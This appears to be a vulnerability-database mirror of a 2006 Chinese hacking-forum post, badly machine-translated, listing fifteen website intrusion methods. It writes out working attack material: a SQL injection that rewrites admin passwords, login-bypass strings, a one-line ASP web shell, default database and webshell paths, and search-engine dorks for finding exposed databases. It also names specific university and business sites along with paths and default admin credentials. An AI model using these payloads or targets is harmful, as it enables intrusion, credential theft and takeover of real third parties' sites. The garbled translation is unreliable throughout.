Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200613031
HistoryNov 27, 2006 - 12:00 a.m.

Hacker network intrusion 1 4 can use the method-vulnerability warning-the black bar safety net

2006-11-2700:00:00
佚名
www.myhack58.com
10
JSON
  1. Upload vulnerability[does not speak]

pS: if you see:Choose your file to upload [re-upload]or there is a“please login”, 8 0% there is a loophole!

Sometimes the upload will not necessarily be successful,it is because Cookies are not the same. We will use WSockExpert made Cookies. Then use the DOMAIN upload.

  1. Injection vulnerability[does not speak]

pS:the MD5 password. Sometimes we are not? easy to run out. If it is the[SQL Database]. Then we can use the following command:

http:// 注入 网址;update admin set password=’new MD5 password’ where password=’old MD5 password’-- [the admin is the table name.]

  1. Side note,that is across the station.

We invaded a station may be the station sturdy invulnerable, we can find the next and this station the same server of the site, and then in the use of this site with mentioning of the right, sniffing and other methods to the invasion we want to invade the site. Here there is a difficulty, is some of the server’s absolute path is encrypted, it will see we’ve got a

  1. Storm library:put two directories in the middle of the/is replaced by%5c

EY:http://www. ahttc. edu. cn/otherweb … s. asp? BigClassName=mandate&BigClassType=1

If you can see:’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’not a valid path. Determine the path name is spelled correctly, and whether the connection to the File Storage Server.

This is the database. Download with FLASHGET into. MDB format.

5.’or’=’or’this is the one that can connect to the SQL language phrase. You can go directly to the background. I collect a bit. Similar:

’or’=’ " or “a”="a ’) or (’a’=’a ") or (“a”="a or 1=1-- ’ or ’a’=’a

  1. Social engineering. This we all know. Just guess the solution.

EY: the http://www.neu.edu.cn/waishi/admin

admin waishi

7. Written in ASP format database. Is the word Trojan [a < %execute request(“value”)%〉], commonly used in the guestbook.

EY: the http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[this is the ASP format of the database], and then write the word Trojan

  1. Source: some web site with online download source code. Some webmasters very dish. What also does not change.

EY:http://www. ahsdxy. ah. edu. cn/xiaoyoulu/index. asp

This station used is: outstanding alumni, the source I have,

Default database/webshell path:\database\liangu_data. the mdb backend management: adm_login. asp password and username are admin

  1. Default database/webshell path use:such a lot of sites/people to others of the WEBSHELL.

/Databackup/dvbbs7. MDB

/bbs/Databackup/dvbbs7. MDB

/bbs/Data/dvbbs7. MDB

/data/dvbbs7. mdb

/bbs/diy. asp

/diy. asp

/bbs/cmd. asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

Tools: website, Hunter mining chicken

EY: the http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

1 0. View a directory of law:the people some of the site can disconnect a directory, you can asked party directory.

EY: the http://www.ujs168.com/shop/admin/

http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

So we can find database, download I don’t need to teach.

1 1. Tool the overflow:. asp? NewsID= a /2j. asp? id=1 8 . asp? id=[this method can get a lot of WEBSHELL]

1 2. Search engines use:

(1). inurl:flasher_list. asp default database:database/the flash. the mdb backend/manager/

(2). Looking for website management background address:

site:xxxx. comintext:management

site:xxxx. comintitle:management of the < keyword a lot, the self has to find the >

site:xxxx. cominurl:login

(3). Find access database,mssql, mysql connection files

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

My master does not do. Self do do.

1 3. COOKIES scams: put your own ID modified to the Administrator’s MD5 password is also modified to his, with Guilin veterans of the tools you can modify COOKIES. This I will not speak more

1 4. The use of a Common Vulnerability: such as dynamic network BBS

EY: the http://js1011.com/bbs/index.asp

You can start with:dvbbs privilege elevation tool, so that the self has become the front Desk administrator.

THEN, the use of:dynamic network solid top patch tool, find a solid-top patch, and then made COOKIES, this to your self do. We can use WSockExpert made Cookies/the NC package

This I will not do, online tutorials, self-have a look.

Tools: dvbbs privilege elevation tool to automatically mesh the solid top of the patch tool

1 5. There are some old vulnerabilities. As IIS3, 4 view the source code, to 5 DELETE

CGI, PHP some of the old hole, I will not say. Too old. There is nothing Dayong.

JSON